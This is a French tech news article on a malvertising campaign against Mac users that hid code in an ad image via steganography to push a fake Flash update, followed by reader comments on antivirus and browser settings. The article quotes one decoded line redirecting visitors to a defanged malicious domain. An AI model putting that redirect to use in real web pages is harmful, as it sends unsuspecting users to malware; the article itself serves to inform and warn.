Une campagne sophistiquée de malvertising a visé les utilisateurs de Mac
Vous naviguez tranquillement sur le web quand, tout à coup, une nouvelle page s’ouvre et vous informe que votre version de Flash doit être mise à jour. Qu’est-ce que vous faites ? Si vous lisez MacGeneration, vous savez qu’il s’agit d’un traquenard et vous fermez l’onglet, mais les utilisateurs moins avertis risquent de télécharger un logiciel malveillant.
Les chercheurs en sécurité de Confiant ont découvert une campagne de malvertising récente visant les utilisateurs de Mac. Le malvertising, c’est l’exploitation de la publicité en ligne (advertising) pour diffuser des logiciels malveillants (malware).
Le principe n’est pas nouveau, mais cette campagne retient l’attention par son ampleur et son perfectionnement. Une image servie 5 millions de fois dans un cadre publicitaire servait de support pour de la stéganographie, c’est-à-dire que sous son apparence inoffensive, elle dissimulait du code servant à duper l’internaute.
Le malandrin VeryMal a créé un bloc canvas (un type d’élément HTML5) qui vérifiait si l’ordinateur avait des polices Apple installées et le cas échéant convertissait chaque pixel de l’image en caractère alphanumérique. Ce qui donnait au bout du compte le code suivant :
top.location.href =’hxxp://veryield-malyst.com/’ + volton + ‘?var1=’ + wsw;
L’internaute était alors dirigé vers une page l’invitant à télécharger une fausse version de Flash qui se trouvait être un logiciel infestant le Mac de pubs.
Des garde-fous limitent heureusement le nombre de victimes potentielles. Les navigateurs peuvent bloquer les téléchargements suspects (la page malveillante indiquait justement comment autoriser le téléchargement) et macOS demande une confirmation avant d’installer un logiciel venant du web. Le conseil est le même que d’habitude : ne téléchargez que ce dont vous avez besoin (vous pouvez sans doute vous passer de Flash maintenant) et à partir de sites de confiance uniquement.
Les anti-virus / anti-phishing détectent-ils cette menace ?
J'ai jamais compris qu'on puisse pas simplement désactiver le téléchargement automatique sur Safari...
Il existe bien la combine de dire "choisir le répertoire d'arrivée à chaque téléchargement" qui sert indirectement de validation (et je suppose qu'en ligne de commande on doit pouvoir trouver un truc) mais je trouve ça assez flippant quand de voir des pubs qui apparaissent et téléchargent des trucs dans mes dossiers sans pression.
Y'a pas besoin de désactiver le téléchargement automatique. Il suffit de ne pas installer.
=> corbeille
Bonjour, j’ai une licence d’un antivirus (Kaspersky) pour plusieurs postes mais je ne l’utilise que sur mes ordis sous Windows (je n’ai jamais eu de virus ni malware), vous pensez qu’il serait préférable que je l’installe aussi sur mon Mac ? Je m’en sers pour du traitement de texte, navigation internet (Netflix, presse mais uniquement sites sécurisés) mais le connecte souvent sur des réseaux publics (université). Qu’en pensez-vous ?
@Eowendil
Aucun antivirus pour ma part et j’ai quitté le monde Windows il y a plus de 10 ans.
Et je n’ai eu aucun problème.
Comme le dit judicieusement MacGé : je ne télécharge que ce dont j’ai besoin et dont j’ai identifié la source.
@Eowendil
Déjà que sur Windows c'est inutile...
Je n'ai jamais eu d'antivirus sur Mac que j'utilise depuis 1983. Je n'ai jamais attrapé de virus mais je ne télécharge pas n'importe quoi.
Le premier virus c'est l'utilisateur qui ne fait pas attention à ce qu'il télécharge.
La piraterie ?☠️ n'est jamais finie !!!
@Elkaar
??
??les spamzer
Pas besoin d’anti-virus sur le Mac, Malwarebytes suffit à protéger votre machine!!!!
le virus numéro 1 étant l'utilisateur , Malwarebytes , certes utile est loin d'être une assurance tous risques..
Le phishing c’est tellement facile... un faux mail de la banque pour évoquer applePay et une majorité sur macgé tomberaient dans le panneau ??
Pour ma part j'utilise Bitdefender et n'ai aucun soucis et pour ce qui est de Flash je ne l'utilise plus.
@corben
Tellement ??
Sur le Mac, pas besoin d’antivirus. Le seul virus que l’on pourrait trouver, c’est le propriétaire du Mac qui fait n’importe quoi.
Est ce qu’il y a une possibilité d’interdire à safari l’ouverture d’une nouvelle page si on n’a pas fait command n ? Je comprend même pas pourquoi un site a le droit de le faire...
Pas vu, certainement grâce à Brave + Ublock + ghostery.
Bah moi je comprends même pas qu’on puisse se faire avoir par ces escroqueries. C’est tellement gros...
Vous faites tourner des logiciels sans acces au code source sur votre machine, qu'en savez vous ?
y en a plein de solutions de protection, si on installe n'importe quoi dans la machine, qui est mon cas par ex. j'utilise Little Snitch qui me montre toute tentative de connexion de mes apps avec l'extérieur. on voit direct qui veut se connecter et où veut-il envoyer des infos. on le stoppe ou on le vire, selon notre choix.
Vous savez que votre mac est livré avec un logiciel qui passe au travers de cette solution en plus d'avoir en permanence acces à 100% de votre appareil n'importe quand ?
De plus, votre logiciel n'est pas open source, pouvez vous assurer qu'il est fiable ? Ni vous ni moi ne pouvons savoir ce qu'il fait reelement
le programme que je parlais Bloque TOUT, même le système entier si on veut. rien va à l'extérieur de la machine.
mais je ne suis pas un espion alors je laisse faire. Apple n'est pas la police mondiale pour le moment.
et puis autant ils peuvent nous espionner, autant on peut jouer avec eux, si on veut. ça marche facilement dans les deux sens.
Non, il ne bloque pas tout, ce que je vous dis, c'est qu'il y a des programmes qui vont bien plus profondement que ce que vous semblez pouvoir imaginer..
Encore une fois, comment pouvez vous affirmer cela sans avoir acces au code source du software ? C'est bien ridicule, vous n'en savez rien, moi non plus.
Renseignez vous sur intel me ..
@Poklo
« il y a des programmes qui vont bien plus profondement que ce que vous semblez pouvoir imaginer. »
On imagine très bien.
Il suffit d’aller sur les sites d’éditeurs comme Huro Log pour s’en convaincre.
Tout le monde n'est pas un utilisateur avancé, et la plupart n'y connaissent rien en informatique, c'est d'ailleurs pour cela qu'ils sont sur Mac OS.
Même un fan de mac averti peut se laisser avoir, à un moment où il sera fatigué, malade, préoccupé.
Faut pas être un génie en informatique pour faire une recherche google !
http://lmgtfy.com/?q=empecher+telechargement+automatique+safari
j'utilise plus le flash. et ces pages, qui proposent d'installer Flash, on les trouve que sur les sites de cul. désinstallez Flash et allez visiter encore les sites du genre. c'est sans danger.